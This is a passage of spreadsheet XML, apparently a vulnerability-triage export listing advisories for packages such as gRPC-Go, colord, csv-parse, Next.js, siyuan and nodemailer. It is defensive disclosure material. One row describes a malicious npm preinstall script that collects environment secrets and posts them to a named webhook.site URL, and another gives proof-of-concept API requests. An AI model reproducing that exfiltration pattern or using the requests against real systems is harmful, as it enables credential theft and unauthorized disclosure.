r="D74" s="5" t="inlineStr" /><c r="E74" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F74" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G74" s="5" t="inlineStr" /><c r="H74" s="5" t="n"><v>0.002</v></c><c r="I74" s="5" t="inlineStr" /><c r="J74" s="5" t="inlineStr" /><c r="K74" s="5" t="inlineStr" /><c r="L74" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M74" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N74" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O74" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P74" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q74" s="5" t="inlineStr" /><c r="R74" s="5" t="inlineStr" /><c r="S74" s="5" t="inlineStr"><is><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is></c><c r="T74" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t></is></c></row><row r="75"><c r="A75" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B75" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C75" s="5" t="inlineStr"><is><t>CVE-2026-84381</t></is></c><c r="D75" s="5" t="inlineStr" /><c r="E75" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F75" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G75" s="5" t="inlineStr" /><c r="H75" s="5" t="n"><v>0.001</v></c><c r="I75" s="5" t="inlineStr" /><c r="J75" s="5" t="inlineStr" /><c r="K75" s="5" t="inlineStr" /><c r="L75" s="5" t="inlineStr"><is><t>PyPI:httpcore2, PyPI:httpx2</t></is></c><c r="M75" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N75" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P75" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q75" s="5" t="inlineStr" /><c r="R75" s="5" t="inlineStr" /><c r="S75" s="5" t="inlineStr"><is><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is></c><c r="T75" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t></is></c></row><row r="76"><c r="A76" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B76" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C76" s="5" t="inlineStr"><is><t>CVE-2026-84382</t></is></c><c r="D76" s="5" t="inlineStr" /><c r="E76" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F76" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G76" s="5" t="inlineStr" /><c r="H76" s="5" t="n"><v>0.004</v></c><c r="I76" s="5" t="inlineStr" /><c r="J76" s="5" t="inlineStr" /><c r="K76" s="5" t="inlineStr" /><c r="L76" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M76" s="5" t="inlineStr"><is><t>2.12.0</t></is></c><c r="N76" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O76" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P76" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q76" s="5" t="inlineStr" /><c r="R76" s="5" t="inlineStr" /><c r="S76" s="5" t="inlineStr"><is><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is></c><c r="T76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t></is></c></row><row r="77"><c r="A77" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B77" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C77" s="5" t="inlineStr"><is><t>CVE-2026-84445</t></is></c><c r="D77" s="5" t="inlineStr" /><c r="E77" s="5" t="inlineStr" /><c r="F77" s="5" t="inlineStr" /><c r="G77" s="5" t="inlineStr" /><c r="H77" s="5" t="n"><v>0.007</v></c><c r="I77" s="5" t="inlineStr" /><c r="J77" s="5" t="inlineStr" /><c r="K77" s="5" t="inlineStr" /><c r="L77" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M77" s="5" t="inlineStr"><is><t>1.82.2, 1.83.2, 1.85.0-dev.0.20260825072537-93e31b48545e</t></is></c><c r="N77" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O77" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P77" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q77" s="5" t="inlineStr" /><c r="R77" s="5" t="inlineStr" /><c r="S77" s="5" t="inlineStr"><is><t>A vulnerability exists in gRPC-Go servers configured with `xds.NewGRPCServer()` where a crafted request missing both `:authority` and `Host` headers can cause a server panic, resulting in a Denial of Service (DoS).

Servers built with `xds.NewGRPCServer` install an xDS routing interceptor on every RPC. This interceptor looks up the request’s `:authority` header to pick a virtual host. The HTTP/2 server transport previously accepted requests that had neither `:authority` nor `Host`. When this happened, the xDS routing interceptor attempted to access the first element of an empty slice of authorities, leading to an index out of bounds panic. Since the per-RPC goroutine does not recover from panics, the entire server process would terminate.

This panic occurs in the interceptor pipeline, meaning the transport credentials handshake (TLS, mTLS, or ALTS) and HTTP/2 connection establishment must complete successfully before the crafted request can reach this logic.
- Insecure/Standard TLS: If the server permits insecure (plaintext) connections or standard credentials (where client certs are not checked), any unauthenticated remote attacker can trigger the crash.
- mTLS / ALTS: If strict transport-level authentication is enforced at the network edge or transport layer (e.g., requiring a valid client certificate), the attacker must possess valid transport credentials to initiate the stream and trigger the panic.

### Impact
An attacker can cause a complete outage of the gRPC server by sending a request missing both `:authority` and `Host` headers, provided they can successfully establish a transport connection.

### Patches
The issue has been addressed in `master` (and backported to `1.83.2` and `1.82.2`). The fix updates the HTTP/2 transport layer to reject requests missing both `:authority` and `Host` headers early, maintaining consistency with and other gRPC language implementations.</t></is></c><c r="T77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84445</t></is></c></row><row r="78"><c r="A78" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B78" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C78" s="5" t="inlineStr"><is><t>CVE-2026-84452</t></is></c><c r="D78" s="5" t="inlineStr" /><c r="E78" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F78" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G78" s="5" t="inlineStr" /><c r="H78" s="5" t="n"><v>0.008999999999999999</v></c><c r="I78" s="5" t="inlineStr" /><c r="J78" s="5" t="inlineStr" /><c r="K78" s="5" t="inlineStr" /><c r="L78" s="5" t="inlineStr"><is><t>PyPI:winml-cli</t></is></c><c r="M78" s="5" t="inlineStr"><is><t>0.4.0</t></is></c><c r="N78" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O78" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P78" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q78" s="5" t="inlineStr" /><c r="R78" s="5" t="inlineStr" /><c r="S78" s="5" t="inlineStr"><is><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is></c><c r="T78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t></is></c></row><row r="79"><c r="A79" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B79" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C79" s="5" t="inlineStr"><is><t>CVE-2026-85061</t></is></c><c r="D79" s="5" t="inlineStr" /><c r="E79" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F79" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G79" s="5" t="inlineStr" /><c r="H79" s="5" t="n"><v>0.003</v></c><c r="I79" s="5" t="inlineStr" /><c r="J79" s="5" t="inlineStr" /><c r="K79" s="5" t="inlineStr" /><c r="L79" s="5" t="inlineStr"><is><t>npm:maplibre-gl</t></is></c><c r="M79" s="5" t="inlineStr"><is><t>6.4.1</t></is></c><c r="N79" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q79" s="5" t="inlineStr" /><c r="R79" s="5" t="inlineStr" /><c r="S79" s="5" t="inlineStr"><is><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is></c><c r="T79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t></is></c></row><row r="80"><c r="A80" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B80" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C80" s="5" t="inlineStr"><is><t>CVE-2026-85062</t></is></c><c r="D80" s="5" t="inlineStr" /><c r="E80" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F80" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G80" s="5" t="inlineStr" /><c r="H80" s="5" t="n"><v>0.003</v></c><c r="I80" s="5" t="inlineStr" /><c r="J80" s="5" t="inlineStr" /><c r="K80" s="5" t="inlineStr" /><c r="L80" s="5" t="inlineStr"><is><t>npm:colord</t></is></c><c r="M80" s="5" t="inlineStr"><is><t>2.9.4</t></is></c><c r="N80" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q80" s="5" t="inlineStr" /><c r="R80" s="5" t="inlineStr" /><c r="S80" s="5" t="inlineStr"><is><t>### Impact

`colord`'s CSS color string matchers described a number as `([+-]?\d*\.?\d+)`. In that form `\d*` and `\d+` can match the same digits, so a run of *n* digits can be divided between them in O(n²) ways, and rejecting an input retries every division. Parsing is synchronous and uninterruptible, so a long malformed color string blocks the thread:

| input | time to reject |
| --- | --- |
| 16 KB | 224 ms |
| 64 KB | 4.4 s |
| 128 KB | 18.5 s |

Reachable through `colord()` and `getFormat()`, and through any method that accepts a color string — including `isEqual()`, `mix()` and `contrast()`. The affected matchers are `parseRgbaString` and `parseHslaString` (built in) and `parseHwbaString`, `parseLchaString`, `parseCmykaString` (plugins).

Growth is polynomial, not exponential — multi-kilobyte payloads are required for a noticeable stall.

### Who is affected

Applications that pass attacker-controlled strings of unbounded length to `colord()` — for example a server validating a color taken from a request body, JSON field, or uploaded stylesheet. `colord` applies no length limit before matching.

Typical client-side use with short input is not meaningfully affected.

### Patches

Fixed in **2.9.4**. The number is now written as `([+-]?(?:\d*\.\d+|\d+))`, which accepts exactly the same syntax but leaves only one way to match it, making rejection linear — 1 MB of input is rejected in ~5 ms.

### Workarounds

Reject or truncate color strings longer than a sane limit (e.g. 100 characters) before passing them to `colord`.</t></is></c><c r="T80" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t></is></c></row><row r="81"><c r="A81" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B81" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C81" s="5" t="inlineStr"><is><t>CVE-2026-85063</t></is></c><c r="D81" s="5" t="inlineStr" /><c r="E81" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F81" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G81" s="5" t="inlineStr" /><c r="H81" s="5" t="n"><v>0.003</v></c><c r="I81" s="5" t="inlineStr" /><c r="J81" s="5" t="inlineStr" /><c r="K81" s="5" t="inlineStr" /><c r="L81" s="5" t="inlineStr"><is><t>npm:csv-parse</t></is></c><c r="M81" s="5" t="inlineStr"><is><t>7.0.2</t></is></c><c r="N81" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q81" s="5" t="inlineStr" /><c r="R81" s="5" t="inlineStr" /><c r="S81" s="5" t="inlineStr"><is><t>### Impact
With columns: true and group_columns_by_name: true, a duplicated __proto__  header causes the duplicate-column branch to assign an array to obj['__proto__'], invoking the __proto__ setter and replacing the parsed record object's prototype with attacker-controlled data. Fixed in 7.0.2 (Object.hasOwn duplicate check + Object.defineProperty assignment).

### Patches
The problem been patched.

### Workarounds
Disable usage of both the columns and  group_columns_by_name options.

### References
issue #496, PR #497</t></is></c><c r="T81" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t></is></c></row><row r="82"><c r="A82" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B82" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C82" s="5" t="inlineStr"><is><t>GHSA-26w7-cxv4-gfx2</t></is></c><c r="D82" s="5" t="inlineStr" /><c r="E82" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F82" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G82" s="5" t="inlineStr" /><c r="H82" s="5" t="inlineStr" /><c r="I82" s="5" t="inlineStr" /><c r="J82" s="5" t="inlineStr" /><c r="K82" s="5" t="inlineStr" /><c r="L82" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M82" s="5" t="inlineStr"><is><t>7.2.8</t></is></c><c r="N82" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q82" s="5" t="inlineStr" /><c r="R82" s="5" t="inlineStr" /><c r="S82" s="5" t="inlineStr"><is><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is></c><c r="T82" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2</t></is></c></row><row r="83"><c r="A83" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B83" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C83" s="5" t="inlineStr"><is><t>GHSA-2q42-4q24-7rgv</t></is></c><c r="D83" s="5" t="inlineStr" /><c r="E83" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F83" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G83" s="5" t="inlineStr" /><c r="H83" s="5" t="inlineStr" /><c r="I83" s="5" t="inlineStr" /><c r="J83" s="5" t="inlineStr" /><c r="K83" s="5" t="inlineStr" /><c r="L83" s="5" t="inlineStr"><is><t>npm:@typespec/compiler, npm:@typespec/openapi3</t></is></c><c r="M83" s="5" t="inlineStr" /><c r="N83" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O83" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P83" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q83" s="5" t="inlineStr" /><c r="R83" s="5" t="inlineStr" /><c r="S83" s="5" t="inlineStr"><is><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is></c><c r="T83" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv</t></is></c></row><row r="84"><c r="A84" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B84" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C84" s="5" t="inlineStr"><is><t>GHSA-2x7j-588g-ccc2</t></is></c><c r="D84" s="5" t="inlineStr" /><c r="E84" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F84" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G84" s="5" t="inlineStr" /><c r="H84" s="5" t="inlineStr" /><c r="I84" s="5" t="inlineStr" /><c r="J84" s="5" t="inlineStr" /><c r="K84" s="5" t="inlineStr" /><c r="L84" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M84" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N84" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O84" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P84" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q84" s="5" t="inlineStr" /><c r="R84" s="5" t="inlineStr" /><c r="S84" s="5" t="inlineStr"><is><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is></c><c r="T84" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2x7j-588g-ccc2</t></is></c></row><row r="85"><c r="A85" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B85" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C85" s="5" t="inlineStr"><is><t>GHSA-2xp9-vwfh-vxw4</t></is></c><c r="D85" s="5" t="inlineStr" /><c r="E85" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F85" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G85" s="5" t="inlineStr" /><c r="H85" s="5" t="inlineStr" /><c r="I85" s="5" t="inlineStr" /><c r="J85" s="5" t="inlineStr" /><c r="K85" s="5" t="inlineStr" /><c r="L85" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M85" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N85" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O85" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P85" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q85" s="5" t="inlineStr" /><c r="R85" s="5" t="inlineStr" /><c r="S85" s="5" t="inlineStr"><is><t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.

Until a fix has propagated, optimization of AVIF files is disabled.</t></is></c><c r="T85" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4</t></is></c></row><row r="86"><c r="A86" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B86" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C86" s="5" t="inlineStr"><is><t>GHSA-38hw-f37p-99jj</t></is></c><c r="D86" s="5" t="inlineStr" /><c r="E86" s="5" t="inlineStr" /><c r="F86" s="5" t="inlineStr" /><c r="G86" s="5" t="inlineStr" /><c r="H86" s="5" t="inlineStr" /><c r="I86" s="5" t="inlineStr" /><c r="J86" s="5" t="inlineStr" /><c r="K86" s="5" t="inlineStr" /><c r="L86" s="5" t="inlineStr"><is><t>npm:i18nexus</t></is></c><c r="M86" s="5" t="inlineStr" /><c r="N86" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O86" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P86" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q86" s="5" t="inlineStr" /><c r="R86" s="5" t="inlineStr" /><c r="S86" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: ghsa-malware (37d8dfb4ceaec110414441ebad5da37dad342ef653a20499504385d9db1ffdac)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86" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16045</t></is></c></row><row r="87"><c r="A87" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B87" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C87" s="5" t="inlineStr"><is><t>GHSA-3j7p-44mj-76hx</t></is></c><c r="D87" s="5" t="inlineStr" /><c r="E87" s="5" t="inlineStr" /><c r="F87" s="5" t="inlineStr" /><c r="G87" s="5" t="inlineStr" /><c r="H87" s="5" t="inlineStr" /><c r="I87" s="5" t="inlineStr" /><c r="J87" s="5" t="inlineStr" /><c r="K87" s="5" t="inlineStr" /><c r="L87" s="5" t="inlineStr"><is><t>npm:krdpass-auth-react-native</t></is></c><c r="M87" s="5" t="inlineStr" /><c r="N87" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q87" s="5" t="inlineStr" /><c r="R87" s="5" t="inlineStr" /><c r="S87" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3a74ab9e45d4f67b40e21dc7491aff1979b4bf79be24bc49b8588916c18b847f)
package.json declares a preinstall script (preinstall.js) that runs automatically on `npm install`. The script collects os.hostname(), os.userInfo(), homedir, internal IP addresses, CI/repository identifiers (GITHUB_REPOSITORY, CI_PROJECT_PATH, JENKINS_URL, etc.), parent package.json metadata, and enumerates process.env keys matching /(TOKEN|KEY|SECRET|PASS|AUTH|CRED|AWS|AZURE|GCP|NPM|GITHUB|GITLAB|API)/i, then POSTs the payload to a hardcoded anonymous collector at https://webhook.site/5ba4d4a7-b977-4bb8-b26e-517b46271316. Bulk env-name enumeration and internal-network / CI-identifier collection are outside any documented purpose of a React Native auth library and disclose to a remote party which credentials exist on the installer or CI runner and how the host is situated. The manifest additionally lists the package's own name (krdpass-auth-react-native ^1.6.0) as one of its dependencies, causing npm to resolve and execute the lifecycle hooks of future self-published versions during install.

## Source: ghsa-malware (802615c8d05ade7426df3338956dc9f1e50c4bfdbb4890b873a978859fa2a537)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87" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16042</t></is></c></row><row r="88"><c r="A88" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B88" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C88" s="5" t="inlineStr"><is><t>GHSA-4qhr-qf46-fcrx</t></is></c><c r="D88" s="5" t="inlineStr" /><c r="E88" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F88" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G88" s="5" t="inlineStr" /><c r="H88" s="5" t="inlineStr" /><c r="I88" s="5" t="inlineStr" /><c r="J88" s="5" t="inlineStr" /><c r="K88" s="5" t="inlineStr" /><c r="L88" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M88" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N88" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O88" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P88" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q88" s="5" t="inlineStr" /><c r="R88" s="5" t="inlineStr" /><c r="S88" s="5" t="inlineStr"><is><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is></c><c r="T88" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx</t></is></c></row><row r="89"><c r="A89" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B89" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C89" s="5" t="inlineStr"><is><t>GHSA-57v5-wqx3-cgj4</t></is></c><c r="D89" s="5" t="inlineStr" /><c r="E89" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F89" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G89" s="5" t="inlineStr" /><c r="H89" s="5" t="inlineStr" /><c r="I89" s="5" t="inlineStr" /><c r="J89" s="5" t="inlineStr" /><c r="K89" s="5" t="inlineStr" /><c r="L89" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M89" s="5" t="inlineStr"><is><t>0.0.0-20260726004013-64c26e74bb82</t></is></c><c r="N89" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O89" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P89" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q89" s="5" t="inlineStr" /><c r="R89" s="5" t="inlineStr" /><c r="S89" s="5" t="inlineStr"><is><t>### Scope note (please read first)

This endpoint does not exist in v3.7.3 or on master. It was introduced on the development branch by commit `acfc02ee8` ("Improve database field visibility across views", #11020) and is live on `v3.7.4-alpha.1`, so it will ship in v3.7.4 unless gated first. No released stable version is affected.

### Summary

`/api/av/getAttributeViewFieldViews` is registered with `CheckAuth` only and applies no publish-access filtering. Given a database `avID`, it returns the complete view structure of that database: every view's name, icon, layout type and the per-field `Hidden` flag, regardless of whether the caller is authorized to see that database or those views.

The route registered immediately before it, `getAttributeViewKeys`, does gate reader roles.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:530` `POST /api/av/getAttributeViewFieldViews` → `model.CheckAuth` → `getAttributeViewFieldViews` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. Greps for `IsReadOnlyRoleContext`, `publishAccess` and `Filter*` all return zero matches |
| Exposed | For each entry in `attrView.Views`: `ID`, `Icon`, `Name`, `Type`, and the `Hidden` flag for the requested field |
| Introduced by | `acfc02ee8` (feature), dev branch only |

**The leak path.** The handler binds `avID` and `keyID`, validating them against the ID pattern only, then calls `GetAttributeViewFieldViews(avID, keyID)`. That function calls `av.ParseAttributeView(avID)`, which reads the database's storage file directly by identifier. There is no ownership check and no publish-access check anywhere on the path. The result is a per-view record for every view the database defines.

What a reader learns is author-written: view names are typed by the user, and layout type distinguishes a table from a gallery or kanban. The `Hidden` flag additionally reveals, per view, which fields the author chose to conceal.

**Guarded sibling, one route earlier.** `getAttributeViewKeys` (`kernel/api/router.go:529`) is also reader-reachable and does gate:

```go
if model.IsReadOnlyRoleContext(c) {
    blockAttributeViewKeys = model.FilterBlockAttributeViewKeysByPublishAccess(c, publishAccess, ...)
}
```

The new route at 530 applies nothing equivalent.

This is worth flagging as more than an isolated omission. `acfc02ee8` added a new reader-reachable attribute-view endpoint during the same development cycle in which the surrounding attribute-view endpoints were being hardened. The same pattern produced an earlier exposure: `f2d966659`, which added encrypted-notebook unlock status for plugin consumption, created a reader-reachable disclosure on a surface that was otherwise being tightened. A check on new reader-reachable routes against the gating applied to their registered neighbours would catch this class before release.

**Reachability, stated honestly.** The endpoint requires a valid `avID` and `keyID`. `renderAttributeView` supplies both to a reader for any database embedded in a document the reader can access. The realistic target is therefore a partially-published database: the document publishes one view, and this endpoint enumerates the existence, name, layout type and hidden-field configuration of the database's other views, including views the author did not publish. Against a database with no reader-accessible surface at all, obtaining the identifiers is harder, particularly since the `getAttributeViewKeysByID` enumeration path was closed on the development branch. The severity below reflects that constraint rather than a worst case.

### Proof of Concept

Precondition: `v3.7.4-alpha.1` build, publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A database embedded in a reader-accessible document, with at least one additional view that is not published.

Step 1, obtain the identifiers through the reader-accessible path:

```
POST http://127.0.0.1:6808/api/av/renderAttributeView
{"id":"&lt;block id of the embedded database in a published doc&gt;"}

→ 200, returns the published view together with its key identifiers
```

Step 2, enumerate the rest of the database's views:

```
POST http://127.0.0.1:6808/api/av/getAttributeViewFieldViews
{"avID":"&lt;avID from step 1&gt;","keyID":"&lt;keyID from step 1&gt;"}

→ 200, returns a record per view: ID, Icon, Name, Type, Hidden
```

The response includes views that were never published, disclosing their author-written names, their layout types, and which field is hidden in each.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can enumerate the full view structure of a database when only part of that database is published. View names are author-written free text and frequently describe the data they filter, so this discloses the existence and subject matter of unpublished views. The per-field `Hidden` flags additionally reveal the author's concealment choices across those views. Confidentiality only, with no integrity or availability impact, and bounded by the reader needing identifiers obtainable from a reader-accessible database.

### Suggested fix

Gate the handler for read-only roles, mirroring `getAttributeViewKeys`: when `IsReadOnlyRoleContext(c)` holds, resolve the block that owns the `avID` and apply the publish-access check before returning any view record, or filter the returned set through the same `FilterBlockAttributeViewKeysByPublishAccess` path its neighbour uses.</t></is></c><c r="T89" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4</t></is></c></row><row r="90"><c r="A90" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B90" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C90" s="5" t="inlineStr"><is><t>GHSA-8m3c-c648-2xjj</t></is></c><c r="D90" s="5" t="inlineStr" /><c r="E90" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F90" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G90" s="5" t="inlineStr" /><c r="H90" s="5" t="inlineStr" /><c r="I90" s="5" t="inlineStr" /><c r="J90" s="5" t="inlineStr" /><c r="K90" s="5" t="inlineStr" /><c r="L90" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M90" s="5" t="inlineStr"><is><t>9.1.1</t></is></c><c r="N90" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q90" s="5" t="inlineStr" /><c r="R90" s="5" t="inlineStr" /><c r="S90" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's `disableFileAccess` / `disableUrlAccess` options are a security sandbox that lets an application forbid untrusted message content (`html`/`text`/attachment `path`/`href`) from reading local files or making outbound HTTP(S) requests. The fix for GHSA-wqvq-jvpq-h66f (commit `5f69497`) threaded these flags through the library's internal resolution paths (`MailMessage.resolveAll()` and `_convertDataImages()`), but the public plugin API `MailMessage.resolveContent(...args)` (`lib/mailer/mail-message.js:41-43`) remains a raw passthrough to `shared.resolveContent()`.

When called with the documented legacy signature `mail.resolveContent(data, key, callback)`, `shared.resolveContent` normalizes the missing options argument to an empty object (`options = options || {}`, `lib/shared/index.js:530`). The message-level flags that the `MailMessage` constructor already copied into `mail.data` (`lib/mailer/mail-message.js:34-38`) are silently discarded, so `resolveContentValue` skips both access-control guards and reaches `nmfetch(url)` (SSRF, `lib/shared/index.js:588`) or `fs.createReadStream(path)` (arbitrary file read, `lib/shared/index.js:597`).

A plugin or application code that resolves message content through the documented API (the same API the library's own `_convertDataImages` uses, threading the flags explicitly) thereby bypasses the sandbox an application deliberately enabled.

### Details

